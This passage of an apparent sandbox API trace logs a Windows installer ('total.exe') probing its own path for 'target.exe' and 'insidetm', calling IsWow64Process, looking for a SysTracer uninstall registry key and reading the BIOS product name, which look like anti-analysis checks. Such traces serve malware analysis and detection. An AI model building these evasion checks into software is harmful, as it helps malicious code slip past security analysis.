"c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.913] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.913] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'target.exe')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'target.exe')i.R0 ?c") returned="ntdll::strstr(t R1, t 'target.exe')i.R0 ?c" [0157.913] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.913] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.913] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.913] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.913] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.913] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.914] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.914] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.914] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.914] lstrcpynA (in: lpString1=0x323058, lpString2="target.exe", iMaxLength=1024 | out: lpString1="target.exe") returned="target.exe" [0157.914] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.914] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.914] lstrlenA (lpString="strstr") returned 6 [0157.914] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.915] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.915] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.915] lstrcpynA (in: lpString1=0x3217a0, lpString2="target.exe", iMaxLength=1024 | out: lpString1="target.exe") returned="target.exe" [0157.915] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.915] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="target.exe") returned 0x0 [0157.915] lstrcpynA (in: lpString1=0x314820, lpString2="target.exe", iMaxLength=1024 | out: lpString1="target.exe") returned="target.exe" [0157.915] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.915] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.915] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.915] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.916] lstrlenA (lpString="0") returned 1 [0157.916] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.916] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.916] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.916] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.916] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.916] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.916] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.916] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.916] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.916] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.917] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.917] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'insidetm')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'insidetm')i.R0 ?c") returned="ntdll::strstr(t R1, t 'insidetm')i.R0 ?c" [0157.917] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.917] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.917] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.917] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.917] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.918] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.918] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.918] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.918] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.918] lstrcpynA (in: lpString1=0x323058, lpString2="insidetm", iMaxLength=1024 | out: lpString1="insidetm") returned="insidetm" [0157.918] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.918] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.918] lstrlenA (lpString="strstr") returned 6 [0157.918] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.918] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.919] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.919] lstrcpynA (in: lpString1=0x3217a0, lpString2="insidetm", iMaxLength=1024 | out: lpString1="insidetm") returned="insidetm" [0157.919] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.919] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="insidetm") returned 0x0 [0157.919] lstrcpynA (in: lpString1=0x314820, lpString2="insidetm", iMaxLength=1024 | out: lpString1="insidetm") returned="insidetm" [0157.919] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.919] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.919] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.919] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.919] lstrlenA (lpString="0") returned 1 [0157.919] lstrcpynA (in: lpString1=0x40a418, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.919] lstrlenA (lpString="FALSE") returned 5 [0157.919] lstrcpynA (in: lpString1=0x432800, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.919] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.919] lstrcpynA (in: lpString1=0x42e3a0, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.919] lstrlenA (lpString="FALSE") returned 5 [0157.919] lstrcpynA (in: lpString1=0x40ac18, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.920] lstrcpynA (in: lpString1=0x40b018, lpString2="TRUE", iMaxLength=1024 | out: lpString1="TRUE") returned="TRUE" [0157.920] lstrcmpiA (lpString1="FALSE", lpString2="TRUE") returned -1 [0157.920] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.920] lstrlenA (lpString="") returned 0 [0157.920] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.920] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.920] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.920] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.920] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.920] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.920] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.920] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.920] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.920] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.920] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.921] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.921] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetCurrentProcess()p.s", iMaxLength=1024 | out: lpString1="kernel32::GetCurrentProcess()p.s") returned="kernel32::GetCurrentProcess()p.s" [0157.921] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.921] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.921] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.921] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.921] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.921] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.921] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.921] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.921] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetCurrentProcess" | out: lpString1="GetCurrentProcess") returned="GetCurrentProcess" [0157.921] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.922] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentProcess") returned 0x75ca1809 [0157.922] lstrcpynA (in: lpString1=0x3217a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.922] GetCurrentProcess () returned 0xffffffff [0157.922] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="-1") returned 2 [0157.922] lstrcpynA (in: lpString1=0x31441c, lpString2="-1", iMaxLength=1024 | out: lpString1="-1") returned="-1" [0157.922] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.922] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.922] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.922] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.922] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.922] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.922] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.922] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.922] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.922] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.922] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.922] lstrcpynA (in: lpString1=0x31482c, lpString2="kernel32::IsWow64Process(ps,*i0s)", iMaxLength=1024 | out: lpString1="kernel32::IsWow64Process(ps,*i0s)") returned="kernel32::IsWow64Process(ps,*i0s)" [0157.923] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.923] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.923] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.923] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.923] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.923] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.923] lstrcpyA (in: lpString1=0x321ba8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.923] lstrcpyA (in: lpString1=0x321fb8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.923] lstrcpyA (in: lpString1=0x3223b8, lpString2="IsWow64Process" | out: lpString1="IsWow64Process") returned="IsWow64Process" [0157.923] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.923] GetProcAddress (hModule=0x75c90000, lpProcName="IsWow64Process") returned 0x75ca195e [0157.924] lstrcpynA (in: lpString1=0x3217a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.924] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2f17c0 | out: Wow64Process=0x2f17c0) returned 1 [0157.924] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="1") returned 1 [0157.924] lstrcpynA (in: lpString1=0x31441c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0157.924] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="-1") returned 2 [0157.924] lstrcpynA (in: lpString1=0x438000, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0157.924] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0157.924] lstrlenA (lpString="1") returned 1 [0157.924] lstrcpynA (in: lpString1=0x40ac18, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0157.924] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.924] lstrcmpiA (lpString1="1", lpString2="0") returned 1 [0157.924] lstrcpynA (in: lpString1=0x40ac18, lpString2="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SysTracer", iMaxLength=1024 | out: lpString1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SysTracer") returned="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SysTracer" [0157.924] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SysTracer", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f7f0 | out: phkResult=0x18f7f0*=0x0) returned 0x2 [0157.924] lstrcpynA (in: lpString1=0x40b018, lpString2="DisplayName", iMaxLength=1024 | out: lpString1="DisplayName") returned="DisplayName" [0157.924] lstrcpynA (in: lpString1=0x40a418, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.924] lstrlenA (lpString="0") returned 1 [0157.924] lstrcpynA (in: lpString1=0x432c00, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.924] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.924] lstrlenA (lpString="0") returned 1 [0157.924] lstrcpynA (in: lpString1=0x40ac18, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.924] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.924] lstrcmpiA (lpString1="0", lpString2="0") returned 0 [0157.924] lstrcpynA (in: lpString1=0x40ac18, lpString2="HARDWARE\\DESCRIPTION\\System\\BIOS", iMaxLength=1024 | out: lpString1="HARDWARE\\DESCRIPTION\\System\\BIOS") returned="HARDWARE\\DESCRIPTION\\System\\BIOS" [0157.924] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\BIOS", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f7f0 | out: phkResult=0x18f7f0*=0x1c) returned 0x0 [0157.925] lstrcpynA (in: lpString1=0x40b018, lpString2="SystemProductName", iMaxLength=1024 | out: lpString1="SystemProductName") returned="SystemProductName" [0157.925] RegQueryValueExA (in: hKey=0x1c, lpValueName="SystemProductName", lpReserved=0x0, lpType=0x18f9d0, lpData=0x432c00, lpcbData=0x18f98c*=0x400 | out: lpType=0x18f9d0*=0x1, lpData="\"SATELLITE L870-18Z\"", lpcbData=0x18f98c*=0x15) returned 0x0 [0157.925] RegCloseKey (hKey=0x1c) returned 0x0 [0157.925] lstrcpynA (in: lpString1=0x42e3a0, lpString2="\"SATELLITE L870-18Z\"", iMaxLength=1024 | out: lpString1="\"SATELLITE L870-18Z\"") returned="\"SATELLITE L870-18Z\"" [0157.925] lstrlenA (lpString="\"SATELLITE L870-18Z\"") returned 20 [0157.925] lstrcpynA (in: lpString1=0x40ac18, lpString2="\"SATELLITE L870-18Z\"", iMaxLength=1024 | out: lpString1="\"SATELLITE L870-18Z\"") returned="\"SATELLITE L870-18Z\"" [0157.925] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.925] lstrcmpiA (lpString1="\"SATELLITE L870-18Z\"", lpString2="0") returned -1 [0157.925] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.925] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.925] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.925] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.925] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.925] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.925] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.925] lstrcpynA (in: lpString1=0x40b018, 